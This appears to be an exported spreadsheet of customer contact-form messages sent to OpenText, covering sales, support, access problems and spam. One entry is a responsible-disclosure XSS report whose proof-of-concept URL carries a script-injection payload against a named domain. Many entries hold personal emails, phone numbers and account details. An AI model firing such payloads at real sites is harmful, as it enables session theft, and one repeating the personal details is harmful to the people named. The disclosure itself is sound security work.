    <t xml:space="preserve">I have a  number of medical practices that i support and need a fax solution that preferable can integrate with an existing MFP device. Or something else that is simple for receptionists/doctors to be able to send/receive faxes </t>
  </si>
  <si>
    <t>Looking to replace Hylafax based system</t>
  </si>
  <si>
    <t>Can your Invoice Capture technology only recognizes English, or can it also perform in other languages, such as German, Hebrew, Japanese, and Chinese?</t>
  </si>
  <si>
    <t>To discuss licensing, training and support package.</t>
  </si>
  <si>
    <t>I need to register dongles to myself please.</t>
  </si>
  <si>
    <t>Knowledge management issues</t>
  </si>
  <si>
    <t xml:space="preserve">Job openings </t>
  </si>
  <si>
    <t>Looking for RightFax Enterprise Server's Latest Install guide...Created account but when I log in, I see "Access Denied" page.</t>
  </si>
  <si>
    <t xml:space="preserve">We are converting our physical servers to virtual ones and implementing disaster recovery as well.  We have used OpenText Rightfax on premise version for over a dozen years.  With the new network configuration, the fax board will go and redundancy introduced.  It appears that Rightfax Connect may address both of these factors.  We would like additional details of how this option differs from our current on premise setup.  Our account# is 327822/SUID 24354-12165 with current version of Rightfax 10.6 FP3.  Thank you, Kathy_x000D_
      </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Does your OpenText Content Suite Platform support SSO like oneLogin?_x000D_
_x000D_
Does your </t>
  </si>
  <si>
    <t>UNIX admin JOB aspirant</t>
  </si>
  <si>
    <t>What are the various types of xPression certifications available with Open text? I remember seeing many with EMC.</t>
  </si>
  <si>
    <t>We are looking into Windows platforms EDI (B2b) software. Can someone call me. _x000D_
We like to send RFP to you for TrustedLink Windows (TLW) and _x000D_
Biz mapper (OpenText)</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Quick Scan software.  I used to get it from Captiva._x000D_
</t>
  </si>
  <si>
    <t>Is RightFax Version 10.0.349 (the desktop client) compatible with Windows 10? What are the system requirements and also, about how old is that release? Please email your response, thank you!</t>
  </si>
  <si>
    <t>Following up._x000D_
NDA Request - Potential Sales - Company full legal name and legal HQ address.  Name, title and email for the person who will sign the NDA. _x000D_
Thanks for your time,_x000D_
Eliza</t>
  </si>
  <si>
    <t>Need a quote for RightFax.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
We are doing some exploratory research on a QMS/Document Management project and are trying to set a budget. We are curious what you would quote a full suite of QMS solutions. This is by no means a binding number - we are just trying to get a feel for what we should budget._x000D_
_x000D_
Thanks!_x000D_
Kaci</t>
  </si>
  <si>
    <t>Where do I contact please regarding a 10 week work placement starting 21st Jan 2019 until 29th March 2019 in the Reading office. Thank You?</t>
  </si>
  <si>
    <t>Estimados señores OPENTEXT, estoy interesado en lo siguiente:_x000D_
1) Ser distribuidor del Producto ENCASE_x000D_
2) Certificarme en el uso del producto_x000D_
Le agradecere me indique los procedimientos a seguir_x000D_
Atte._x000D_
_x000D_
Percy De la Cruz</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am interested in learning more about the digital capabilities of Open Text for my client. I am in the process of evaluating products that can create a holistic learning experience for employees. I would like to speak to someone knowledgeable about the product who can provide information about the functions available and Open Texts integration capabilities. Thank you and I look forward to speaking with someone soon. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
How does the licensing for Exceed Turbo X work?_x000D_
Do the licenses for Exceed Turbo X come in packs? for instance a pack of 5 licenses, 10 etc. Or do you have to buy invidviual licenses?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to discuss what your product RightFax can do for us. We are looking for a possible fax solution that integrates with multiple EHR systems. </t>
  </si>
  <si>
    <t>we're looking at using the Encase software on our new Win10 device and would like some feed back has the device will not always be connected to the network.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning Opentext,_x000D_
 _x000D_
This is Stormy Snider, Managing Director for Prospect Support® LLC, I hope you’re doing well.  I'm an Award-Winning Business Development and Sales professional with over 15 years of Appointment Setting, Cold-Calling, B2B Prospecting and Lead Generation experience. Upon reviewing information about your Business Development needs, I would be interested in opportunities to prospect and generate new leads for Opentext, as well as set up Qualified Appointments for your Sales Team! _x000D_
 _x000D_
As an Award-Winning Professional, I work independently through my registered LLC-- Prospect Support® LLC, in which I can conveniently invoice you for services. This has many advantages and can prove more cost-effective than you having to hire a full-time employee. _x000D_
_x000D_
I’d like to provide you with a Special Discount so that you can experience how I would support your team. Please let me know if I can email this to you today, along with an Overview of Services? I look forward to your response, and thanks in advance for your consideration!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Stormy Snider_x000D_
Managing Director | Prospect Support®, LLC_x000D_
301-379-5500 : ssnider@prospectsupport.com_x000D_
Leave the prospecting to us!®_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am neither able to access the support portal nor can raise ticket. Kindly guide what needs to be done._x000D_
I already registered but whenever I click confirm registration link received via email subject "OpenText Connect - Account Created" . It is navigating me to login form which repeats the same process.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need an account for your developer portal._x000D_
Your registration Form doesn't work fine._x000D_
May you help me?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Can i have a full version of this application? Thank you!</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Neither me nor my colleague (jchubert@operadeparis.fr) can use the support site._x000D_
_x000D_
For me (erousseau@operadeparis.fr) I can connect to MySupport but I can't open a ticket._x000D_
_x000D_
My colleague can't connect to MySupport. He receive a confirmation mail, and click on the link, but his account is never confirmed._x000D_
_x000D_
Can you help us ?_x000D_
_x000D_
Thank you_x000D_
_x000D_
Etienne</t>
  </si>
  <si>
    <t>We can increase attendee registration for your event with our travel management platform and our growing network of companies. We work with global corporate events like Fast Company's Innovation Festival, Ascent, Lift and many others and would love to work with your event. Who can we speak to about a partnership?</t>
  </si>
  <si>
    <t>Dear all,_x000D_
_x000D_
For private use (documents and paper from the study) We'd like to ask you for an offer. The product should allow:_x000D_
access by mobile device_x000D_
search function, also for added remarks_x000D_
preview of the found documents which the searched key words are highlighted _x000D_
Installing on NAS_x000D_
What product do you recommend and what the costs for:_x000D_
The Application itself_x000D_
Number of user: _x000D_
- For the installation and setup of the structure (first year) =&gt; one user (administrator)_x000D_
- After one year two user_x000D_
- Later, 2-3 years, 3-5 users_x000D_
Support on installation if needed _x000D_
Approx. 2-4 h product training by Teamviewer (maybe two session a two hours)_x000D_
After the installation support by e-mail or short sessions by Teamviewer_x000D_
Updates of hot fixes _x000D_
Updates of new releases (if possible offer it separately because not each new release is necessary)_x000D_
_x000D_
Our location will be in few month New Zealand or Canada (the product will be used on our new location). _x000D_
_x000D_
Best Regards,_x000D_
Leana, Andrin, Thomas</t>
  </si>
  <si>
    <t>Good day_x000D_
Please give me the same access as Gary Muller G.Muller@eoh.co.za_x000D_
I am a parter with EOH Mthombo employee_x000D_
_x000D_
Thank you and kind regards_x000D_
Johantie</t>
  </si>
  <si>
    <t>bonjour,_x000D_
_x000D_
je souhaite rentrer en contact avec le commercial pour des informations sur des compétences gupta_x000D_
merci</t>
  </si>
  <si>
    <t>motrata?</t>
  </si>
  <si>
    <t>We would like to know more about ECM product. Hence, who can we contact with for more information? Are there any contact persons in Hong Kong and in Singapore?_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I am here to complain regarding Srujan Krishna , he is such a crude person he doesn't have manners. He is so annoying and his personality is very worse.Please teach him how to behave when he works at client place.</t>
  </si>
  <si>
    <t>Hi OpenText / Guidance Software Team!_x000D_
_x000D_
I have an urgent opportunity for the EnCase Forensic software and UltraKit TX1. Could you please refer me to your distributor here in the Philippines? We would like to engage regarding our end user's requirement. Looking forward to your soonest response. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Hope you are doing well._x000D_
I am Max Williams (Jitesh Chauhan), Marketing manager with one of the fastest growing Digital Marketing Company based in India. If you ever wonder why is your website not ranking high or generating higher traffic &amp; revenue than your competitors then here are the following reasons:_x000D_
_x000D_
1. Less user friendly content structure._x000D_
2. Website on-page issues._x000D_
3. Lack of quality content optimization_x000D_
3. Not targeting the keywords properly on the page._x000D_
5. Low quality links and lack do-follow links to the site._x000D_
_x000D_
Your loss is your competitor’s gain i.e. the traffic which could have generated quality sales for you goes to your competitors as they rank well in the Search Engine Result Pages (SERPs) organically. _x000D_
To brief you about the company: We do SEO, SMO and reputation management for our clients. Our team of dedicated Google Analytic and Adwords certified professionals excel in promoting and increasing the visibility of a website in various search engines which will directly help in increasing traffic to your website._x000D_
This email just tells you the fraction of things we do, our optimization process involves many other technical factors which can be sent to you on your request. Simply revert back to this email with your name and the best number to catch you on, and we can have quick 3 minute chat to see if we can help you grow traffic, leads and sales._x000D_
 _x000D_
Best Regards,_x000D_
Max Williams_x000D_
</t>
  </si>
  <si>
    <t>First page ranking on Google_x000D_
_x000D_
We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. Thanks!_x000D_
_x000D_
If not interested, please reply with STOP/UNSUBSCRIBE.</t>
  </si>
  <si>
    <t>With the Online learning subscription , is this subscription transferable to another user if the subscribed user is no longer employed with our company</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I need some one to contact me about integration of opentext fax with Office 365 calling._x000D_
_x000D_
Regards john</t>
  </si>
  <si>
    <t xml:space="preserve">I have been attempted to get a hold of a live person but not able to. I need phone number for Human Resource verification of employment. </t>
  </si>
  <si>
    <t>Trial version of OpenText Content Suite to review the DMS platform for suitability. Please contact for further requirements.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to open a new account for Active Catalogue </t>
  </si>
  <si>
    <t>Ascena brands is asking us to set up EDI with them and they gave us your info. can we set up a call monday to discuss what is needed to get started.</t>
  </si>
  <si>
    <t>Good Afternoon:_x000D_
_x000D_
I am searching for an electronic document management system for the creation, review,_x000D_
approval, and implementation of changes to documents such as Standard Operating Procedures, Policies, Forms, etc.  Can you please send me more information for your Documentum for Quality and Manufacturing?_x000D_
_x000D_
Thanks,_x000D_
Sonia I. Ramos</t>
  </si>
  <si>
    <t>Application retirement / business Continuity / Archiving / Records Management</t>
  </si>
  <si>
    <t>Need an online training program for our client and interested in viewing pricing options.</t>
  </si>
  <si>
    <t xml:space="preserve">Parabenizar o atendente (EMERSON) do suporte que reinstalou o programa cobrança Caixa, muito atencioso, ágil e simpático.    </t>
  </si>
  <si>
    <t xml:space="preserve">This program is the worst. It does not allow for fluid productivity regarding documentation since it is always outdated. Right now I am unable to open roughly $2Mill worth of Bills of Lading because your IRM does not work with the current (updated!) version of Adobe! This is the THIRD time this has occurred in the last YEAR!!! I have been pushing MSC to stop using your software as it is a complete waste of time for very TIME SENSITIVE documentation. </t>
  </si>
  <si>
    <t>Possible sales - in need of NDA from Opentext</t>
  </si>
  <si>
    <t>Hi I am a current fourth year student in University of Toronto Scarborough. I am currently analyzing open text for an investment thesis. Can you please help me understand your value chain or supply chain of the industry and company. For example in a Pharmaceutical industry, the value chain starts with_x000D_
_x000D_
Research to Discover Drugs_x000D_
Approval of Drugs by Government Regulators_x000D_
Manufacture of Drugs_x000D_
Creation of Demand for Drugs_x000D_
Distribution to Consumers_x000D_
_x000D_
The same way can you please tell us how the value chain process starts for Opentext and the industry that it is operating in. _x000D_
_x000D_
I would be very grateful if you could introduce me to someone who would be able to discuss OpenText Corporation in further detail._x000D_
_x000D_
Your sincerely,_x000D_
Yasir Arafat</t>
  </si>
  <si>
    <t>We are performing a Tool Evaluation for some large scale customers with HQ in Germany. Would you like to participate in this evaluation? W´d contact your german Office several times  - but never get any feedback from them til now. Pls let us know if you´re interested in this Business opportunity or not. Thanks very much and best regards, Klaus</t>
  </si>
  <si>
    <t>Hi there, I was hoping to speak to a sales representative about OpenText/Mediabin. Please feel free to reach out to me via email to setup a time to chat. Thanks, Jose</t>
  </si>
  <si>
    <t>Birchbox is partnering with Walgreens for consignment sales and I need a solution on processing EDIs.  Walgreens suggested to contact you.  Can be reached at 551-497-8997</t>
  </si>
  <si>
    <t>I would like to set up an introductory call with OpenText and our SVP of IT, Cecila Li.</t>
  </si>
  <si>
    <t>Current Alchemy users - - - need a machine/scanner upgrade and specs.  What type of scanner do you recommend?  Machine specs ???  Operating system ???  Please see our current usage/licensing in your files &amp; system.  Thanks so much.</t>
  </si>
  <si>
    <t>Setting the SFTP configuration does not stick.  The credentials are good and tested fine with an FTP browser.</t>
  </si>
  <si>
    <t>Looking for pricing on analytic data (weekly sales reports) for our locations within Kroger. We currently have about 105 locations.</t>
  </si>
  <si>
    <t>Account nduhamel@lalique.fr blocked._x000D_
Thanks to deblock it.</t>
  </si>
  <si>
    <t>Does OpenText Blazon have the capability to programmatically remove pages from a pdf if the entire page was redacted? And could you point me to any documentation you might have regarding this functionality?</t>
  </si>
  <si>
    <t>I am looking for Brava training. Course 3-1707. I was unable to find cost &amp; duration information. I did see that none are currently scheduled but in order for me to secure funding I need to start with cost, duration and potential location.</t>
  </si>
  <si>
    <t xml:space="preserve">RFP....we are interested in including open text in an RFP. Please contact ASAP, if you wish to be included. </t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Je suis Frédérique Versal, Chef de projet chez Micropole. Nous sommes en train de mener une étude de marché sur les logiciels de GED / Dématérialisation et nous aimerions avoir des informations concernant votre logiciel, et notamment sur ses fonctionnalités. _x000D_
_x000D_
Afin de mieux appréhender votre outil, serait-il possible de nous faire parvenir une documentation et/ou prévoir un rendez-vous téléphonique ?  _x000D_
_x000D_
Dans l'attente de votre retour, je vous souhaite une bonne journée. _x000D_
_x000D_
Bien cordialement</t>
  </si>
  <si>
    <t>Need quote for On -premise solution and below documentation if available_x000D_
Quote should be for_x000D_
 0-100_x000D_
100-200_x000D_
250+_x000D_
_x000D_
site readiness checklist_x000D_
Server requirements_x000D_
Hardware requirements</t>
  </si>
  <si>
    <t>Need an urgent quote for government  :_x000D_
QTY 1                     PIXTOOLS Software Maintenance, 3 years_x000D_
_x000D_
If you can source the item and quote a price we’d be very appreciative._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Adrien Miller | Office Assistant – Conf._x000D_
Internal Services Department | Administration_x000D_
Main Office (559) 600-6200 | Direct (559) 600-5821_x000D_
Please help asap on this._x000D_
_x000D_
thanks,</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
This vulnerability report is sent in accordance with your responsible disclosure policy at /about/copyright-information/security-acknowledgements_x000D_
_x000D_
Title_x000D_
[us.register.covisint.#com] XSS in /CommonReg_x000D_
_x000D_
Note_x000D_
This contact form throws an error when I attempt to make a submission containing URLs. Due to this, I have inserted a hashtag (#) in domains to be able to send the submissions. This needs to be removed in order to follow a link._x000D_
_x000D_
Description_x000D_
The page us.register.covisint.#com /CommonReg is vulnerable to reflected XSS attacks through the "cmd" GET parameter._x000D_
_x000D_
Attack scenario_x000D_
An attacker can create a link containing an arbitrary XSS payload. The payload will execute under the scope of the vulnerable domain in the browser of any victim who visits the link. This could e.g. be used to steal sessions, manipulate page content, tamper with cookies, launch browser-specific exploits or circumvent the web site’s CSRF protection._x000D_
_x000D_
Proof of concept_x000D_
This link triggers a (harmless) JavaScript alert, thus serving as a PoC of successfully injected JavaScript through XSS. This was verified in Mozilla Firefox 62.0.3._x000D_
_x000D_
Make sure to remove the hashtag (#) before following the URL_x000D_
us.register.covisint.#com/CommonReg?cmd=%3Cinput/autofocus/onfocusin=%22alert%60XSS%60_x000D_
_x000D_
Recommended solution_x000D_
Make sure to utilize a safe encoding when echoing parameters to the page._x000D_
_x000D_
Thank you in advance for your attention to this matter. Please let me know if I can assist you further to resolve this vulnerability._x000D_
_x000D_
Best regards_x000D_
_x000D_
Kasper Karlsson_x000D_
Omegapoint Göteborg, Sweden</t>
  </si>
  <si>
    <t>Client has a RFP for regulated content management (eTMF, Reg Docs, Quality Docs).  We need contact information for sales so that we may send the RFP to you.  Please contact me today (10/04/2018) after 1 PM.  Thank you</t>
  </si>
  <si>
    <t>We are looking for a solution that would allow our outside client access to documents held on a saas secured server. We are a property management company using MRI and one of MRI's other clients referred us to your firm. Thank you, Nathan</t>
  </si>
  <si>
    <t>Hello, my customer Woods Hole Oceanographic Institution in Woods Hole, MA has requested a proposal for an enterprise fax solution from RightFax.  PCM is a RightFax partner, but I do not know who the RightFax sales rep is so that I can reach out.  Can you let me know who would cover this account so that I can touch base?  Thank You Christine</t>
  </si>
  <si>
    <t>Auld &amp; White has sent me something to view and I can't open</t>
  </si>
  <si>
    <t>We are looking to file customs entries directly with customs and saw EasyLink listed as a pre-approved VAN provider we could utilize. I am looking to schedule a phone conference where we could discuss our expectations, your services, timeline, and price estimates. Thanks!</t>
  </si>
  <si>
    <t>Hi,  Please share the reseller quote for the all 3 editions of EnCase Forensic 8.07.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir ,_x000D_
_x000D_
We are in need of a customizable application  that we can use for our Engineering , Procurement and Construction Projects Transmittal /Correspondece Document ,Workflow and Revision Management._x000D_
_x000D_
We would be glad if you can reach us by email/phone and give a preliminary offer for your application._x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Exhibition/Sponsorship/Collaboration _x000D_
_x000D_
Greetings from Herbal Conference 2018. I would like to invite you to be a part of this conference. 5th International Conference on Herbal and Traditional Medicine is the best platform with  professionally  designed scientific program for the audience. It includes symposiums, workshops, keynote lectures, plenary talks, panel discussions and poster sessions on latest research and technological developments in the field of Herbal, traditional and Chinese Medicine as well as therapeutic aspects. The conference invites Experts like Herbalists, Acupuncturists, Natural healers, Researchers, Students, Young researchers and business delegates across the globe to be a part of this wonderful event, full of networking and knowledge sharing opportunity._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need to unsubscribe too many emails_x000D_
</t>
  </si>
  <si>
    <t>VIM Consultant training</t>
  </si>
  <si>
    <t>Need help. I have two dongles Encase 8. I have been able to download encase V8.07 but i cannot process evidence nor search. I can not register the dongle too. please Help</t>
  </si>
  <si>
    <t>To whom it may concern, I would like to apply for the position of IT Service Desk Analyst. I sincerely hope that you will give me a chance to meet you in person to discuss my candidacy further. Thank you in advance!</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am looking for character recognition offerings for our customer onboarding process.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madame/Sir, _x000D_
_x000D_
I am Abdelrahman Natsheh from Hayyan Horizons, we are an IT security Company and we have one of our customers here in Jordan asking for some Forensic Hardware equipment which we believe is relevant to you. the customer is University of Jordan so please contact me back so I can share with you the RFP and the exact requirements._x000D_
_x000D_
Thank you _x000D_
Best Regards_x000D_
Abdelrahman_x000D_
</t>
  </si>
  <si>
    <t>As a partner of OpenText, I would like to request some changes on our company page on the OpenText website. The current information is not accurate anymore and therefore I would like to deliver some changes to update our company page.</t>
  </si>
  <si>
    <t>I have registered with my official Id and trying to login with the same it is showing me this error " Access Denied ,We're sorry but you don't have permission to view this page"  Please help for the same.</t>
  </si>
  <si>
    <t>Reminder on our request to be your partner in Nigeria especially to support your SAP solution is Shell Petroleum Development Company, Nigeria. We are support IT services in Shell Nigeria. We are currently providing SAP support to Shell Nigeria. We are looking forward to have a business relationship with you. Thank you.</t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
We have published a market research report on Global Security Assurance Market-forecasts to 2025._x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report.</t>
  </si>
  <si>
    <t>Hello. I am contacting you regarding the Installation and configuration of TPR and Encase._x000D_
Also i want to know your avalability on Saturday and Sunday as in Afghanistan these are the official working Days._x000D_
Thanks and Regards</t>
  </si>
  <si>
    <t>Osaka</t>
  </si>
  <si>
    <t>ご担当者様_x000D_
お世話になります。_x000D_
サポートよりご回答頂いたリリースノートへのアクセスができません。_x000D_
メールアドレスはitgsap@ml.jp.panasonic.comとなります。_x000D_
状況のご確認をお願いできますでしょうか。</t>
  </si>
  <si>
    <t xml:space="preserve">SSL/TLS Certificate Renewal _x000D_
Ticket Number:	IM1869210_x000D_
- we need a new certificate_x000D_
- word doc in your attachment can't be opened in MS word 2003_x000D_
- how do we install the certificate in Check Point VPN (securemote R56 build 615)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello! My office has purchased Encase Forensic 8 license and i have dongle, but i need EnCase Forensic 8 Installation file, where can i get it? I also try to register in My Support but it says No Access you need to get confirmation e-mail but when i get it and confirm it and log in it stills says you need confirmatioun e-mail to get My Support. Please help me</t>
  </si>
  <si>
    <t>I'm looking for a link to the current version of your Opentext IRM client for PDF plugin for Outlook. The current version of Adobe Acrobat Reader DC will not load the old older version 5.1.2025. Many Thanks. Dan</t>
  </si>
  <si>
    <t>Hi.  I tried to register for the Host Intrusion Methodology and Investigation course that will run from December 18-21 in Pasadena but when I clicked the button to complete registration I got an error.  Please assist.  Thanks._x000D_
_x000D_
Jaston</t>
  </si>
  <si>
    <t>I need to know how this tool is effective against steganalysis. What are the advantage and limitation of this tool regarding steganalysis?</t>
  </si>
  <si>
    <t xml:space="preserve">My manager and I are looking into what's involved with upgrading Rightfax, latest technologies, and cost.  We are interested in learning if OpenText has a Rightfax solution suitable for production and dr.  I can be contact by email or phone.  _x000D_
_x000D_
Thanks_x000D_
_x000D_
Aaron  </t>
  </si>
  <si>
    <t xml:space="preserve">Right Fax server Brooktrout idle, offline state. Can't receive or send fax. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">What do we need to do to port an existing fax line (POTs line) to Fax2Mail?_x000D_
</t>
  </si>
  <si>
    <t>I am trying to get into /support.opentext com page but get access denied.  I work for the state of Missouri department of labor and Frank Ketterman has set up my access, I am replacing Jason Volkart.</t>
  </si>
  <si>
    <t>Requesting a quote for renewal for 9 mos of service.</t>
  </si>
  <si>
    <t>I'm looking for documentation on the latest release of OTX Exstream,   As part of our upgrade project I need a better understanding of the capabilities of communication server and content author to revise my architectural capability model for Exstream.  Thanks</t>
  </si>
  <si>
    <t>We are interested in setting up a demo for your Enterprise Content Management Software.</t>
  </si>
  <si>
    <t>current Alchemy user - considering upgrade.  need machine specs - thank you</t>
  </si>
  <si>
    <t>We are looking to upgrade to EnCase 8 and would like to schedule a call to discuss this ASAP</t>
  </si>
  <si>
    <t>We are looking to upgrade to EnCase 8 and would like to schedule a call to discuss this.</t>
  </si>
  <si>
    <t>Hello, does rightfax support SNMP version 3? Thank you</t>
  </si>
  <si>
    <t>I'd like a demo of Media Management</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to get a trial version of OpenText Brava! (HTML 5) and Blazon to view and test capabilities of the products. </t>
  </si>
  <si>
    <t xml:space="preserve">Trying to register for careers with the above email address and it will not let me. Have tried to reset password and have not recieved email. </t>
  </si>
  <si>
    <t>Can you please send me a copy of any contracts required for your OpenText Fax2Mail service. I need for our legal tem to review to determine if we could use your service.</t>
  </si>
  <si>
    <t xml:space="preserve">Paid $32,160.00 for NX post processors that DON'T WORK. Please contact asap to resolve. </t>
  </si>
  <si>
    <t>Hi guys looking to find out the min hardware requirements for installing the "opentext WebDAV client Components" and which OS's they work with?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I need a quote for a Captiva implementation _x000D_
Could you please contact me? _x000D_
Best regards,_x000D_
_x000D_
Luis Barros </t>
  </si>
  <si>
    <t xml:space="preserve">Are you having a conference in 2019 in las vegas in MAy? </t>
  </si>
  <si>
    <t>Registration</t>
  </si>
  <si>
    <t>Inquiry about an old Hummingbird 401K status...need to determine if it still exists or not._x000D_
I have account number details...please email me.</t>
  </si>
  <si>
    <t>Please send me a receipt for a $103.02 charge made to my credit card ending in 3420.  The transaction date was 9/22/2018.  If necessary, please call me at 239-790-7504.  Thank you.</t>
  </si>
  <si>
    <t>Need to download TrustedLink System i Version 6.3 - client version._x000D_
Can I get this off your website?</t>
  </si>
  <si>
    <t>للتعلم</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a quote for the annual training passport. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know the pricing for Documentum, not for immediate buying, but we want to see what are our options and pricings for reference for now </t>
  </si>
  <si>
    <t>We move to VoIP and I'm getting this communications errors from some inbound faxes  Resulting status code (0/352; 4/105): Receive failure (Phase B)</t>
  </si>
  <si>
    <t>Hello! I am a new developer at the Hartford and am looking to have a new license key assigned to me. I will be taking over the key that was assigned to Rebecca Somers.</t>
  </si>
  <si>
    <t>Project requirements</t>
  </si>
  <si>
    <t>Dear Sir/ Madam, _x000D_
_x000D_
I was wandering if there was already some information available about  Opentext Enterprise world 2019. Because i was searching for information about the prices for being a sponsor and having a stand. And the cost for a guest ticket. _x000D_
If the information for next year is not available yet, maybe you have the information of last year for me. Than i at least have a rough idea of what it could be. _x000D_
_x000D_
I'm looking forward to your answer _x000D_
_x000D_
With kind regards, _x000D_
_x000D_
Maria van Hijfte</t>
  </si>
  <si>
    <t>looking for recommended hardware for running Brava! Desktop</t>
  </si>
  <si>
    <t>Hello,_x000D_
we are looking for a trial or demo version of OpenText Capture Recognition Engine (RecoStar) to try out its reliability. Have you trial or demo version which you can share us?_x000D_
_x000D_
Best regards,_x000D_
Sofia</t>
  </si>
  <si>
    <t xml:space="preserve">Working on behalf of UBS which has a Documentum maintenance renewal due shortly but we have no contact details for account / renewals manager at OpenText. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
We passed registration for the EU Business Register for 2018/2019. We registered two members: Mistyukov Alexey and Raznikov Alexey. But we got only one form “Company data control”. Is it enough? We sent you scan the completed form. Now we must also send the original to the following address?_x000D_
_x000D_
Please confirm that you see the registration for two members. We didn't get an answer from 'marketing@go.kofax.com'; contact@eu-register.eu_x000D_
</t>
  </si>
  <si>
    <t>I am looking for a Business Rules Engine and Case Management solution.</t>
  </si>
  <si>
    <t>No access to Knowledge Center</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
We are in the need to migrate the complete data/documents from one server to another(To merge the data resides in the two different servers), Kindly provide us the feasible solution to perform this activity at the server level. So that we can start the activity ASAP._x000D_
Thanks,_x000D_
Rasheed</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour _x000D_
Je souhaiterais être contacté par un Partner account ou Channel manager svp. Pour un client grand compte.  </t>
  </si>
  <si>
    <t>Enterprise Search Solution</t>
  </si>
  <si>
    <t>Interested in OpenText Document Presentment modules. Require costing.</t>
  </si>
  <si>
    <t>We are evaluating OpenText solutions for an upcoming project. We wish to know the differences between you and Kofax</t>
  </si>
  <si>
    <t>Hello! We have bought EnCase Forensic 8 with dongle but where i can get Encase Forensic 8 installation files? I tried to register at this site for support but when i did and tried to sign up i get message Access Denied .</t>
  </si>
  <si>
    <t>gio</t>
  </si>
  <si>
    <t xml:space="preserve">Hi team   I need trial software for documentum content management to test the product and then use it with Licence later </t>
  </si>
  <si>
    <t>Appliying for outbound sales</t>
  </si>
  <si>
    <t>Unable to access knowledge base.</t>
  </si>
  <si>
    <t xml:space="preserve">NCR is a global tech company changing how people everywhere bank, shop, eat, and travel since 1884 &amp; having over 20000 professional working in 180 countries across globe._x000D_
_x000D_
We are also into Telecom &amp; Technology vertical where we provide services  like Install, Move, Add &amp; Delete of any network or telecom equipment like Router, Switch, Firewall or Access Point of various OEMs &amp; provide services structured cabling, OFC cabling, site surveys, annual maintenance , equipment on rental &amp; equipment disposal &amp; staging for these equipment to our end customers._x000D_
_x000D_
Mostly we are participating in big RFPs floated by Telcos  like BT, Telstra, Singtel, Vodafone  &amp; also work with various OEMS to provide above stated services to their customers._x000D_
_x000D_
We are looking for vendors to support us deliver above mentioned services across APAC (Country-Malaysia) region. Appreciate if we could get connected for discussion for business engagement. _x000D_
_x000D_
Looking forward to you._x000D_
_x000D_
Regards_x000D_
_x000D_
Sumedh Salve_x000D_
Supplier Manager  (APAC) – Telecom &amp; Technology_x000D_
NCR Corporation, Godrej IT Park, Vikhroli (W), Mumbai 400079_x000D_
office: +91-22-61954165  |  mobile: +91-7738774484_x000D_
sumedhk.salve@ncr.com  _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">looking at demo introduction (technical) of how hard copies can be digitized and back up to cloud. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText_x000D_
I want to buy Exceed on Demand Version 14+ for 20 Users to use for 1st phase of the project. and number of user is estimated up to around 100._x000D_
Please send me a price for 20 Users first._x000D_
Appreciate,_x000D_
Duc Le_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Current customer Looking for security documentation for your fax service. We need to bid 2 other vendors and need to know what security model to look for in other companies.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am a business analyst for SAP MM module. I was recently assigned to handle the OpenText system as well. Currently, we are in the process of upgrading our ECM archive server, content server, extended ECM, and process platform to 16.2. I would like to inquire about your training._x000D_
_x000D_
I am looking for a training that will help me leverage the content server in a way that users don't need to login to SAP to get the information they need like the notifications or work orders but instead see it in the content server side. If I'm not wrong, this can be met using workspaces in the content server. _x000D_
_x000D_
With that said, I am more interested in learning the 2-0106 Content Server Information Administration. Is this the right training? If so, I noticed that it has couple prerequisites training. Are these really required to get the course I want to?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Patrick_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,  _x000D_
_x000D_
I am looking for a quote on these Part numbers below._x000D_
 _x000D_
PN: S-CPASPSupport   QTY 2_x000D_
 RightFax Support for 1 Year for Servers: 62592- _x000D_
 12318 &amp; 68702-12318 for the period 11/1/2018 - 10/31/2019 _x000D_
_x000D_
_x000D_
 PN:  S-CPFG2100D1-N   QTY 2_x000D_
Fax Gateway 2100 Modular Fax Gateway _x000D_
 1T1/E1 SIP/T.38 1 Year of Standard Support for SUID: 60652-12318 &amp; 66862-12318 for the period 11/1/2018 - 10/31/2019 _x000D_
_x000D_
